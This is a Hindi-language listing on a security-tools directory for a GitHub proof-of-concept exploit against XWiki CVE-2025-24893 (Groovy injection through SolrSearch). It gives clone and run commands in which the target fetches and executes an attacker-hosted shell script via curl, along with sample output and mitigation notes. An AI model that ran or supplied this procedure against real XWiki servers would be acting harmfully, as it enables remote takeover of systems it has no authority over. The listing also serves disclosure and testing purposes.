Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
xwiki-cve-2025-24893-poc — CVE-2025-24893 के लिए PoC | Kitploit
उपकरण/GitHubGitHub/570rmbr3ak3r/xwiki-cve-2025-24893-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHub570rmbr3ak3r/xwiki-cve-2025-24893-poc

xwiki-cve-2025-24893-poc

CVE-2025-24893 के लिए PoC

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
3141 साल पहलेअभी तक समीक्षित नहीं
साझा करें

XWiki RCE Exploit PoC (CVE-2025-24893)

परिचय

इस रिपॉजिटरी में XWiki रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) एक्सप्लॉइट शामिल है, जिसे CVE-2025-24893 के रूप में पहचाना गया है। यह भेद्यता एक हमलावर को SolrSearch एंडपॉइंट पर एक क्राफ्टेड अनुरोध का लाभ उठाकर लक्ष्य XWiki इंस्टेंस पर मनमाना कोड निष्पादित करने की अनुमति देती है। यह स्क्रिप्ट HTTP और HTTPS दोनों लक्ष्यों का समर्थन करती है।

⚠️ अस्वीकरण: यह PoC केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना सिस्टम के खिलाफ इस कोड का अनधिकृत उपयोग अवैध और अनैतिक है। किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

भेद्यता विवरण

  • CVE ID: CVE-2025-24893
  • प्रभावित घटक: XWiki SolrSearch एंडपॉइंट
  • प्रभाव: रिमोट कोड एक्ज़ीक्यूशन (RCE)
  • परामर्श: GitHub Security Advisory

यह भेद्यता SolrSearch एंडपॉइंट में उपयोगकर्ता इनपुट के अनुचित हैंडलिंग के कारण उत्पन्न होती है, जो एक क्राफ्टेड पेलोड के माध्यम से Groovy कोड के इंजेक्शन की अनुमति देती है। यह PoC दर्शाता है कि कैसे एक हमलावर लक्ष्य सर्वर पर मनमाने कमांड निष्पादित करने के लिए इसका शोषण कर सकता है।

आवश्यक शर्तें

  • Python 3.x
  • आवश्यक Python लाइब्रेरीज़: requests, , , ,
argparse
urllib.parse
re
html
  • CVE-2025-24893 के लिए संवेदनशील एक लक्ष्य XWiki इंस्टेंस
  • बैश स्क्रिप्ट होस्ट करने के लिए एक हमलावर-नियंत्रित सर्वर, HTTP या HTTPS के माध्यम से सुलभ
  • लक्ष्य पर निष्पादित किए जाने वाले कोड वाली एक फ़ाइल
  • स्थापना

    1. इस रिपॉजिटरी को क्लोन करें:
      root@kitploit:~
      git clone https://github.com/570RMBR3AK3R/xwiki-cve-2025-24893-poc.git
      
    2. आवश्यक Python लाइब्रेरीज़ स्थापित करें:
      root@kitploit:~
      pip install requests
      

    उपयोग

    स्क्रिप्ट लक्ष्य XWiki इंस्टेंस को एक क्राफ्टेड HTTP/HTTPS अनुरोध भेजती है, जिसमें एक Groovy पेलोड इंजेक्ट किया जाता है जो हमलावर-नियंत्रित सर्वर से एक फ़ाइल लाने और चलाने के लिए curl कमांड निष्पादित करता है।

    निम्नलिखित कमांड के साथ स्क्रिप्ट चलाएं:

    root@kitploit:~
    python3 exploit.py --url <target_url> --server <attacker_server> --file <malicious_file> [--no-verify]
    

    तर्क

    • --url: लक्ष्य XWiki इंस्टेंस का आधार URL (जैसे, http://target या https://target)।
    • --server: हमलावर के सर्वर का IP या होस्टनाम, यदि आवश्यक हो तो पोर्ट सहित (जैसे, 192.168.1.100:8080). HTTP और HTTPS दोनों का समर्थन करता है।
    • --file: हमलावर के सर्वर पर निष्पादित किए जाने वाले कोड वाली फ़ाइल का नाम (जैसे, exploit.sh)।
    • --no-verify: HTTPS लक्ष्यों के लिए SSL सत्यापन अक्षम करने का वैकल्पिक फ्लैग (सावधानी से उपयोग करें, केवल परीक्षण के लिए)।

    उदाहरण

    root@kitploit:~
    python3 exploit.py --url http(s)://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh
    

    SSL सत्यापन को बायपास करने के लिए (उदाहरण के लिए, स्व-हस्ताक्षरित प्रमाणपत्रों के लिए):

    root@kitploit:~
    python3 exploit.py --url https://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh --no-verify
    

    यह करेगा:

    1. एक पेलोड बनाएगा जो curl कमांड निष्पादित करने के लिए Groovy स्क्रिप्ट का उपयोग करता है।
    2. हमलावर के सर्वर (http(s)://192.168.1.100:8080) से निर्दिष्ट फ़ाइल (exploit.sh) लाएगा।
    3. लाए गए फ़ाइल को लक्ष्य सिस्टम पर निष्पादित करेगा।
    4. आउटपुट निकालकर प्रदर्शित करेगा, किसी भी HTML टैग और एंटिटी को साफ करेगा।

    आउटपुट

    स्क्रिप्ट लक्ष्य से प्रतिक्रिया निकालती है, HTML टैग (जैसे, <br/>, <del>) हटाती है, और पठनीयता के लिए HTML एंटिटी को सादे पाठ में परिवर्तित करती है। साफ़ किया गया आउटपुट कंसोल पर मुद्रित होता है।

    नमूना

    root@kitploit:~
    python3 exploit.py --url http://<redacted> --server http://<redacted>:8080 --file exploit.sh 
    uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
    

    सीमाएं

    • लक्ष्य XWiki इंस्टेंस CVE-2025-24893 के लिए संवेदनशील होना चाहिए।
    • हमलावर का सर्वर लक्ष्य सिस्टम से HTTP या HTTPS के माध्यम से सुलभ होना चाहिए।
    • स्क्रिप्ट मानती है कि लक्ष्य सर्वर SolrSearch एंडपॉइंट और Groovy निष्पादन का समर्थन करता है।

    शमन

    इस भेद्यता से बचाव के लिए:

    • XWiki को नवीनतम पैच किए गए संस्करण में अपडेट करें।
    • विस्तृत शमन चरणों के लिए GitHub Security Advisory देखें।
    • संदर्भ के लिए ब्लॉग CVE-2025-24893

    लाइसेंस

    यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है। विवरण के लिए LICENSE फ़ाइल देखें।

    टूल डाउनलोड करें